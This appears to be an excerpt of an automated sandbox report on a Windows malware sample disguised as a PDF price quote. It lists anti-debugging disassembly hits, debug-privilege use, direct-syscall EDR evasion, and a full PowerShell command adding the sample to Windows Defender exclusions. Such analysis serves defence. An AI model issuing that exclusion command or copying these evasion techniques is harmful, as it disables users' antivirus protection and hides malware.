Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B029F9 mov eax, dword ptr fs:[00000030h] 7_2_01B029F9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B029F9 mov eax, dword ptr fs:[00000030h] 7_2_01B029F9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5E9E0 mov eax, dword ptr fs:[00000030h] 7_2_01B5E9E0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B049D0 mov eax, dword ptr fs:[00000030h] 7_2_01B049D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9A9D3 mov eax, dword ptr fs:[00000030h] 7_2_01B9A9D3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B669C0 mov eax, dword ptr fs:[00000030h] 7_2_01B669C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h] 7_2_01ADA9D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h] 7_2_01ADA9D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h] 7_2_01ADA9D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h] 7_2_01ADA9D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h] 7_2_01ADA9D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADA9D0 mov eax, dword ptr fs:[00000030h] 7_2_01ADA9D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B6892B mov eax, dword ptr fs:[00000030h] 7_2_01B6892B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5892A mov eax, dword ptr fs:[00000030h] 7_2_01B5892A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5C912 mov eax, dword ptr fs:[00000030h] 7_2_01B5C912
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AC8918 mov eax, dword ptr fs:[00000030h] 7_2_01AC8918
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AC8918 mov eax, dword ptr fs:[00000030h] 7_2_01AC8918
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E908 mov eax, dword ptr fs:[00000030h] 7_2_01B4E908
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E908 mov eax, dword ptr fs:[00000030h] 7_2_01B4E908
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5C97C mov eax, dword ptr fs:[00000030h] 7_2_01B5C97C
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF6962 mov eax, dword ptr fs:[00000030h] 7_2_01AF6962
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF6962 mov eax, dword ptr fs:[00000030h] 7_2_01AF6962
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF6962 mov eax, dword ptr fs:[00000030h] 7_2_01AF6962
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B74978 mov eax, dword ptr fs:[00000030h] 7_2_01B74978
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B74978 mov eax, dword ptr fs:[00000030h] 7_2_01B74978
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B1096E mov eax, dword ptr fs:[00000030h] 7_2_01B1096E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B1096E mov edx, dword ptr fs:[00000030h] 7_2_01B1096E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B1096E mov eax, dword ptr fs:[00000030h] 7_2_01B1096E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B50946 mov eax, dword ptr fs:[00000030h] 7_2_01B50946
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4940 mov eax, dword ptr fs:[00000030h] 7_2_01BA4940
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5C89D mov eax, dword ptr fs:[00000030h] 7_2_01B5C89D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0887 mov eax, dword ptr fs:[00000030h] 7_2_01AD0887
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0C8F9 mov eax, dword ptr fs:[00000030h] 7_2_01B0C8F9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0C8F9 mov eax, dword ptr fs:[00000030h] 7_2_01B0C8F9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9A8E4 mov eax, dword ptr fs:[00000030h] 7_2_01B9A8E4
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFE8C0 mov eax, dword ptr fs:[00000030h] 7_2_01AFE8C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA08C0 mov eax, dword ptr fs:[00000030h] 7_2_01BA08C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0A830 mov eax, dword ptr fs:[00000030h] 7_2_01B0A830
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7483A mov eax, dword ptr fs:[00000030h] 7_2_01B7483A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7483A mov eax, dword ptr fs:[00000030h] 7_2_01B7483A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h] 7_2_01AF2835
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h] 7_2_01AF2835
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h] 7_2_01AF2835
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF2835 mov ecx, dword ptr fs:[00000030h] 7_2_01AF2835
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h] 7_2_01AF2835
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF2835 mov eax, dword ptr fs:[00000030h] 7_2_01AF2835
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5C810 mov eax, dword ptr fs:[00000030h] 7_2_01B5C810
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B66870 mov eax, dword ptr fs:[00000030h] 7_2_01B66870
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B66870 mov eax, dword ptr fs:[00000030h] 7_2_01B66870
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5E872 mov eax, dword ptr fs:[00000030h] 7_2_01B5E872
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5E872 mov eax, dword ptr fs:[00000030h] 7_2_01B5E872
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B00854 mov eax, dword ptr fs:[00000030h] 7_2_01B00854
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE2840 mov ecx, dword ptr fs:[00000030h] 7_2_01AE2840
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD4859 mov eax, dword ptr fs:[00000030h] 7_2_01AD4859
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD4859 mov eax, dword ptr fs:[00000030h] 7_2_01AD4859
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B84BB0 mov eax, dword ptr fs:[00000030h] 7_2_01B84BB0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B84BB0 mov eax, dword ptr fs:[00000030h] 7_2_01B84BB0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0BBE mov eax, dword ptr fs:[00000030h] 7_2_01AE0BBE
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0BBE mov eax, dword ptr fs:[00000030h] 7_2_01AE0BBE
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5CBF0 mov eax, dword ptr fs:[00000030h] 7_2_01B5CBF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFEBFC mov eax, dword ptr fs:[00000030h] 7_2_01AFEBFC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD8BF0 mov eax, dword ptr fs:[00000030h] 7_2_01AD8BF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD8BF0 mov eax, dword ptr fs:[00000030h] 7_2_01AD8BF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD8BF0 mov eax, dword ptr fs:[00000030h] 7_2_01AD8BF0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0BCD mov eax, dword ptr fs:[00000030h] 7_2_01AD0BCD
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0BCD mov eax, dword ptr fs:[00000030h] 7_2_01AD0BCD
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0BCD mov eax, dword ptr fs:[00000030h] 7_2_01AD0BCD
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF0BCB mov eax, dword ptr fs:[00000030h] 7_2_01AF0BCB
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF0BCB mov eax, dword ptr fs:[00000030h] 7_2_01AF0BCB
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF0BCB mov eax, dword ptr fs:[00000030h] 7_2_01AF0BCB
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7EBD0 mov eax, dword ptr fs:[00000030h] 7_2_01B7EBD0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFEB20 mov eax, dword ptr fs:[00000030h] 7_2_01AFEB20
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFEB20 mov eax, dword ptr fs:[00000030h] 7_2_01AFEB20
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B98B28 mov eax, dword ptr fs:[00000030h] 7_2_01B98B28
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B98B28 mov eax, dword ptr fs:[00000030h] 7_2_01B98B28
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h] 7_2_01B4EB1D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4B00 mov eax, dword ptr fs:[00000030h] 7_2_01BA4B00
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACCB7E mov eax, dword ptr fs:[00000030h] 7_2_01ACCB7E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7EB50 mov eax, dword ptr fs:[00000030h] 7_2_01B7EB50
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA2B57 mov eax, dword ptr fs:[00000030h] 7_2_01BA2B57
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA2B57 mov eax, dword ptr fs:[00000030h] 7_2_01BA2B57
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA2B57 mov eax, dword ptr fs:[00000030h] 7_2_01BA2B57
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA2B57 mov eax, dword ptr fs:[00000030h] 7_2_01BA2B57
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B84B4B mov eax, dword ptr fs:[00000030h] 7_2_01B84B4B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B84B4B mov eax, dword ptr fs:[00000030h] 7_2_01B84B4B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B78B42 mov eax, dword ptr fs:[00000030h] 7_2_01B78B42
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B66B40 mov eax, dword ptr fs:[00000030h] 7_2_01B66B40
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B66B40 mov eax, dword ptr fs:[00000030h] 7_2_01B66B40
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9AB40 mov eax, dword ptr fs:[00000030h] 7_2_01B9AB40
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AC8B50 mov eax, dword ptr fs:[00000030h] 7_2_01AC8B50
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD8AA0 mov eax, dword ptr fs:[00000030h] 7_2_01AD8AA0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD8AA0 mov eax, dword ptr fs:[00000030h] 7_2_01AD8AA0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B26AA4 mov eax, dword ptr fs:[00000030h] 7_2_01B26AA4
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B08A90 mov edx, dword ptr fs:[00000030h] 7_2_01B08A90
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h] 7_2_01ADEA80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4A80 mov eax, dword ptr fs:[00000030h] 7_2_01BA4A80
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0AAEE mov eax, dword ptr fs:[00000030h] 7_2_01B0AAEE
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0AAEE mov eax, dword ptr fs:[00000030h] 7_2_01B0AAEE
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B04AD0 mov eax, dword ptr fs:[00000030h] 7_2_01B04AD0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B04AD0 mov eax, dword ptr fs:[00000030h] 7_2_01B04AD0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0AD0 mov eax, dword ptr fs:[00000030h] 7_2_01AD0AD0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B26ACC mov eax, dword ptr fs:[00000030h] 7_2_01B26ACC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B26ACC mov eax, dword ptr fs:[00000030h] 7_2_01B26ACC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B26ACC mov eax, dword ptr fs:[00000030h] 7_2_01B26ACC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFEA2E mov eax, dword ptr fs:[00000030h] 7_2_01AFEA2E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0CA38 mov eax, dword ptr fs:[00000030h] 7_2_01B0CA38
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0CA24 mov eax, dword ptr fs:[00000030h] 7_2_01B0CA24
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF4A35 mov eax, dword ptr fs:[00000030h] 7_2_01AF4A35
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF4A35 mov eax, dword ptr fs:[00000030h] 7_2_01AF4A35
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5CA11 mov eax, dword ptr fs:[00000030h] 7_2_01B5CA11
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4CA72 mov eax, dword ptr fs:[00000030h] 7_2_01B4CA72
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4CA72 mov eax, dword ptr fs:[00000030h] 7_2_01B4CA72
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7EA60 mov eax, dword ptr fs:[00000030h] 7_2_01B7EA60
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0CA6F mov eax, dword ptr fs:[00000030h] 7_2_01B0CA6F
Enables debug privileges
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtProtectVirtualMemory: Direct from: 0x77542F9C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtSetInformationProcess: Direct from: 0x77542C5C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtOpenKeyEx: Direct from: 0x77542B9C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtProtectVirtualMemory: Direct from: 0x77537B2E Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtCreateFile: Direct from: 0x77542FEC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtOpenFile: Direct from: 0x77542DCC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQueryInformationToken: Direct from: 0x77542CAC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtTerminateThread: Direct from: 0x77542FCC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtDeviceIoControlFile: Direct from: 0x77542AEC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C Jump to behavior
